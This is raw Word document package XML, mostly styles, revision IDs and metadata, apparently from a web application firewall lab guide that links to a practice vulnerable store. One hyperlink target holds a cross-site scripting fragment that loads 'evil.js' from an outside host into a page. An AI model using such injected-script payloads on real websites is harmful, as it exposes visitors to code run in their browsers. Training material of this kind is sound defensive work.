    <w:rsid w:val="6A711EBE"/>
    <w:rsid w:val="6A9851C5"/>
    <w:rsid w:val="6AB027AC"/>
    <w:rsid w:val="6ACD9135"/>
    <w:rsid w:val="6B2B5C7A"/>
    <w:rsid w:val="6BA0B94A"/>
    <w:rsid w:val="6BA2E161"/>
    <w:rsid w:val="6BDF5A95"/>
    <w:rsid w:val="6C35BE0F"/>
    <w:rsid w:val="6C4BF80D"/>
    <w:rsid w:val="6C9291BD"/>
    <w:rsid w:val="6D54996B"/>
    <w:rsid w:val="6DB830C8"/>
    <w:rsid w:val="6E1A2BF4"/>
    <w:rsid w:val="6E7633A8"/>
    <w:rsid w:val="6F0EABE4"/>
    <w:rsid w:val="6F47BE56"/>
    <w:rsid w:val="70401691"/>
    <w:rsid w:val="70A8120E"/>
    <w:rsid w:val="714142AE"/>
    <w:rsid w:val="7182ACA4"/>
    <w:rsid w:val="71E3BB91"/>
    <w:rsid w:val="7212A78D"/>
    <w:rsid w:val="722435AA"/>
    <w:rsid w:val="727384C8"/>
    <w:rsid w:val="72AF9082"/>
    <w:rsid w:val="739EE5E2"/>
    <w:rsid w:val="74E611A3"/>
    <w:rsid w:val="74EFA377"/>
    <w:rsid w:val="753AB214"/>
    <w:rsid w:val="75634D21"/>
    <w:rsid w:val="75815ECB"/>
    <w:rsid w:val="759250FB"/>
    <w:rsid w:val="76037E38"/>
    <w:rsid w:val="760B5E82"/>
    <w:rsid w:val="765C487B"/>
    <w:rsid w:val="76EFAAD2"/>
    <w:rsid w:val="7712B1F0"/>
    <w:rsid w:val="771C133F"/>
    <w:rsid w:val="774F63EA"/>
    <w:rsid w:val="775988C0"/>
    <w:rsid w:val="778FF361"/>
    <w:rsid w:val="77DC03C3"/>
    <w:rsid w:val="785696A9"/>
    <w:rsid w:val="78E9FB9A"/>
    <w:rsid w:val="7911D2BB"/>
    <w:rsid w:val="798C4362"/>
    <w:rsid w:val="79C60CBD"/>
    <w:rsid w:val="7A2F478F"/>
    <w:rsid w:val="7A2FB86E"/>
    <w:rsid w:val="7A98A0B1"/>
    <w:rsid w:val="7ABF52B7"/>
    <w:rsid w:val="7ACBD262"/>
    <w:rsid w:val="7AFA4DA6"/>
    <w:rsid w:val="7B06AB01"/>
    <w:rsid w:val="7B61DD1E"/>
    <w:rsid w:val="7C0F6BAF"/>
    <w:rsid w:val="7C1471E0"/>
    <w:rsid w:val="7C38D84B"/>
    <w:rsid w:val="7CFDAD7F"/>
    <w:rsid w:val="7D116EAA"/>
    <w:rsid w:val="7D670F09"/>
    <w:rsid w:val="7D9737B3"/>
    <w:rsid w:val="7DB2AD81"/>
    <w:rsid w:val="7DD99FAE"/>
    <w:rsid w:val="7E0BC734"/>
    <w:rsid w:val="7E776988"/>
    <w:rsid w:val="7E8B19AC"/>
    <w:rsid w:val="7F0F18B4"/>
    <w:rsid w:val="7F14FCFA"/>
    <w:rsid w:val="7F1B87F9"/>
    <w:rsid w:val="7F618BD4"/>
    <w:rsid w:val="7F685D52"/>
    <w:rsid w:val="7F698058"/>
    <w:rsid w:val="7F813D74"/>
    <w:rsid w:val="7FA989B1"/>
    <w:rsid w:val="7FD147B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ACA8F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C0AFBE99-DD7A-4C97-8BA5-9CE15BB5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F558A"/>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D01EA"/>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D01EA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia"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D01EA"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="3"/>
      <w15:collapsed/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F9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1D4841"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00670816"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00544AC0"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B1ABD"/>
    <w:rPr>
      <w:color w:val="800080" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="004B6A8F"/>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B6A8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B6A8F"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:after="160"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtitleChar" w:customStyle="1">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Subtitle"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="004B6A8F"/>
    <w:rPr>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading1Char" w:customStyle="1">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002F558A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D01EA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading3Char" w:customStyle="1">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D01EA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="243F60" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Heading4Char" w:customStyle="1">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D01EA"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="003B48A4"/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:color="auto" w:sz="4" w:space="4"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="160"/>
      <w:ind w:left="864" w:right="864"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="QuoteChar" w:customStyle="1">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003B48A4"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00163BC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63B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654298">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="50159962">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="458841338">
          <w:marLeft w:val="1800"/>
          <w:marRight w:val="1800"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="180755041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9256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hyperlink" Target="https://waas.barracudanetworks.com/" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml" Id="rId29"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customXml" Target="../customXml/item2.xml" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item4.xml" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badstore.cudathon.com" TargetMode="External" Id="R2720bb54895a474c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badstore.cudathon.com" TargetMode="External" Id="Rd4d95911f8874e51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://barracuda.slack.com//xss-doc.appspot.com/static/evil.js';document.body.appendChild(s)" TargetMode="External" Id="Rfb27b3a3a0f54f37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badstore.cudathon.com/" TargetMode="External" Id="Rfa309458df8b4bb7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat" TargetMode="External" Id="R0cf9c5f4913c4c84" /><Relationship Type="http://schemas.microsoft.com/office/2019/09/relationships/intelligence" Target="/word/intelligence.xml" Id="R6881ba4d214f4dce" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://badstore.cudathon.com" TargetMode="External" Id="R701fd6181269470c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://141.193.180.136" TargetMode="External" Id="Ra5f73baa72c54baa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image24.png" Id="Rd057b56a2f904acc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image25.png" Id="R2b23d9af144748c9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image26.png" Id="Ra9d2d54003a74da2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image27.png" Id="Rde0755db51f94e01" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.jpg" Id="R5b304c43d3b44ddb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image28.png" Id="R0720cb91a8c14343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image29.png" Id="R4a38cf861c7a4f8f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2a.png" Id="R3385b30cd63742d3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2b.png" Id="R3ebf62b5c6804bf4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2c.png" Id="R133e532f0a1c46fc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2d.png" Id="Rb8209f084fd841fb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2e.png" Id="Racc5d68acf6c48a5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2f.png" Id="R536b265db9424b02" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image30.png" Id="R7cd171a20c424522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image31.png" Id="Re02e9111b8e944ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image32.png" Id="R0333646600ca4526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image33.png" Id="R35f83a5b0a744dd7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image34.png" Id="R872cedb9e56f4d49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image35.png" Id="R04422b027ca443b6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3a.png" Id="R2db6164534374ffc" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3b.png" Id="Rd46dde86a56149b6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3c.png" Id="R8f9328f7e4eb4758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image41.png" Id="R3a08f8857fc04e32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image43.png" Id="R759704582ee04a82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.jpg" Id="Rb2632b9442d74f50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image44.png" Id="R4ec05f5ba5c34d9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98DB6DB9E9A5A4CB3BEAE51B1DE4187" ma:contentTypeVersion="6" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="378fab6fbf90f7f0e9204e81e916b1fb">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="cc031a03-b3ee-448c-89ec-a9dba7248368" xmlns:ns3="a7fccbc4-b1de-4cd0-b913-725fd0ffe0a5" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="43c5357e50de3b8aeeab486062a9fc96" ns2:_="" ns3:_="">
    <xsd:import namespace="cc031a03-b3ee-448c-89ec-a9dba7248368"/>
    <xsd:import namespace="a7fccbc4-b1de-4cd0-b913-725fd0ffe0a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031a03-b3ee-448c-89ec-a9dba7248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fccbc4-b1de-4cd0-b913-725fd0ffe0a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10CA25-C91B-4F5B-87E9-9CB6F8B36B88}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E60510B2-31D4-4CC2-8BC3-D8CF532D09D2}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{940A9514-F76F-4911-BCAF-8AED2A84E645}"/>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3F1A5075-8B51-4648-B94A-AD7AB81C485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Wenyu Zhang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Brett Wolmarans</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-06T14:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-16T15:25:36Z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0x010100698DB6DB9E9A5A4CB3BEAE51B1DE4187</vt:lpwstr>
  </property>
</Properties>
</file>